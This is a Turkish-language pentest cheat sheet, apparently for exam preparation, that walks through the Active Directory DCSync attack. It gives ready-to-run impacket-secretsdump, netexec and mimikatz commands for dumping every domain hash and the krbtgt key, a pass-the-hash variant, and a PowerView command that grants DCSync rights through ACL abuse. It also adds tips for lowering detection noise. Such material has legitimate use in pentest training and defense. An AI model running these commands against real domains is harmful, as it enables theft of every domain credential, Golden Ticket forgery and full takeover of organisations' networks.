FOOTHOLD Metodoloji Cheat-sheet
Post ✓ EXAM-SAFE zor :445:135:389

DCSync — Replication ile krbtgt ve Tum Domain Hash'leri

Replicating Directory Changes (DS-Replication-Get-Changes / -All) hakkina sahip bir principal'la, bir DC'yi taklit ederek tum domain'in NTLM hash'lerini (krbtgt dahil) DRSUAPI replikasyon protokolu uzerinden cekersin. NTDS.dit'e fiziksel erisim gerekmeden. krbtgt hash'i = Golden Ticket.

Bilgi: ÖN KOŞULLAR
  • DS-Replication-Get-Changes + DS-Replication-Get-Changes-All haklari (Domain Admins, Enterprise Admins, Administrators ya da delege edilmis ACL)
  • DC ile ag baglantisi (445/135/389)
┌──

Komutlar

impacket-secretsdump ✓ EXAM-SAFE domain-admin
impacket-secretsdump -just-dc {{DOMAIN}}/{{USER}}:{{PASS}}@{{DC_IP}}
DCSync ile tum domain NTLM + Kerberos key'leri (cleartext olanlar dahil) DRSUAPI uzerinden ceker. WADComs — Impacket-secretsdump-DCSync; HackTricks — DCSync
impacket-secretsdump ✓ EXAM-SAFE domain-admin
impacket-secretsdump -just-dc-ntlm {{DOMAIN}}/{{USER}}:{{PASS}}@{{DC_IP}}
Sadece NTLM hash'lerini ceker (Kerberos key/history haric, daha hizli/sade cikti). HackTricks — DCSync (just-dc-ntlm)
impacket-secretsdump ✓ EXAM-SAFE domain-admin
impacket-secretsdump -just-dc-user {{DOMAIN}}/krbtgt {{DOMAIN}}/{{USER}}:{{PASS}}@{{DC_IP}}
Tek kullanici (krbtgt) hash'ini ceker — Golden Ticket icin yeterli, gurultuyu azaltir. HackTricks — DCSync krbtgt; Impacket secretsdump -just-dc-user
impacket-secretsdump ✓ EXAM-SAFE domain-admin
impacket-secretsdump -just-dc -hashes :{{NTHASH}} {{DOMAIN}}/{{USER}}@{{DC_IP}}
Pass-the-hash ile DCSync (parola yerine NTLM hash kullanarak). WADComs — Impacket-secretsdump-PtH; HackTricks — DCSync PtH
netexec ✓ EXAM-SAFE domain-admin
nxc smb {{DC_IP}} -u {{USER}} -p {{PASS}} --ntds
NetExec DRSUAPI ile NTDS'i (tum domain hash) dumplar; --ntds-history ile parola gecmisi de. NetExec Wiki — --ntds (DRSUAPI); HackTricks — DCSync
netexec ✓ EXAM-SAFE domain-admin
nxc smb {{DC_IP}} -u {{USER}} -p {{PASS}} --ntds --user krbtgt
NetExec ile sadece krbtgt hash'ini DRSUAPI uzerinden ceker. NetExec Wiki — --ntds --user
mimikatz ✓ EXAM-SAFE domain-admin
mimikatz # lsadump::dcsync /domain:{{DOMAIN}} /user:krbtgt
Windows-side: mimikatz ile DC'den krbtgt'yi replikasyon cagrisiyla ceker (Golden Ticket malzemesi). HackTricks — mimikatz lsadump::dcsync; help-mimikatz
mimikatz ✓ EXAM-SAFE domain-admin
mimikatz # lsadump::dcsync /domain:{{DOMAIN}} /user:Administrator
Administrator (ya da herhangi bir hedef) NTLM hash'ini DCSync ile ceker. HackTricks — mimikatz lsadump::dcsync /user
powerview ✓ EXAM-SAFE admin
Add-DomainObjectAcl -TargetIdentity "DC=corp,DC=local" -PrincipalIdentity {{USER}} -Rights DCSync
ACL abuse: WriteDACL'in varsa kendine DCSync haklarini delege edip sonra DCSync calistir (persistence + privesc). HackTricks — DCSync via ACL (Add-DomainObjectAcl); The Hacker Recipes — DCSync

DCSync nedir?

Domain Controller’lar birbirleriyle dizin verisini DRSUAPI (Directory Replication Service Remote Protocol) ile senkronize eder. DCSync, bir saldirganin kendini bir DC gibi gosterip DRSGetNCChanges cagrisiyla secret attributes (unicodePwd = NTLM hash, supplementalCredentials = Kerberos key’ler) istemesidir. NTDS.dit’e fiziksel erisim gerekmez — sadece dogru replikasyon hakkina.

Gereken hak: Replicating Directory Changes

DCSync calistirabilmek icin principal’in domain naming context uzerinde su iki extended right’i olmali:

  1. DS-Replication-Get-Changes (GUID 1131f6aa-…)
  2. DS-Replication-Get-Changes-All (GUID 1131f6ad-…)

Bu haklar default olarak Domain Admins, Enterprise Admins, Administrators ve DC’lerde bulunur. Ama ACL abuse senaryosunda dusuk yetkili bir hesaba bu haklar yanlislikla/kotu niyetle delege edilmis olabilir (BloodHound bunu GetChanges/GetChangesAll/DCSync edge’i olarak gosterir). O zaman DA olmadan da DCSync yapilir.

Adim adim

  1. Prereq: DCSync hakki olan bir hesabin kimligi (parola ya da NTLM hash).
  2. Hedef sec: Genelde once krbtgt (Golden Ticket icin), sonra -just-dc ile tum domain.
  3. Calistir: Linux’tan impacket-secretsdump -just-dc ya da nxc --ntds; Windows’tan mimikatz lsadump::dcsync.
  4. Sonuc: Tum kullanicilarin NTLM hash’i + krbtgt. Artik pass-the-hash, Golden Ticket ve tam domain kontrolu.

krbtgt neden bu kadar onemli?

krbtgt hesabinin hash’i, domain’deki tum TGT’leri imzalayan anahtardir. Onu ele gecirince Golden Ticket uretip istedigin SID/yetkiyle istedigin kullaniciyi taklit edebilirsin (bkz. ad-tickets). Bu yuzden DCSync ciktisindan krbtgt en degerli satirdir.

Gotchas

  • -just-dc Kerberos key’leri (aes256/aes128/des) ve parola gecmisini de verir; sadece NTLM yeterliyse -just-dc-ntlm daha hizli.
  • DRSUAPI cagrisi DC’de Event ID 4662 uretir (replication audit) — gercek operasyonda gurultuludur; tek kullanici cekerek (-just-dc-user krbtgt) azaltabilirsin.
  • Read-Only DC (RODC) tam replikasyon vermez; writable DC’yi hedefle.
  • PtH ile DCSync: parola yoksa -hashes :{{NTHASH}} formatini kullan (LM bos, sadece NT).
┌──

Kaynaklar

↗ HackTricks — DCSync↗ The Hacker Recipes — DCSync↗ WADComs — Impacket secretsdump
0/15 set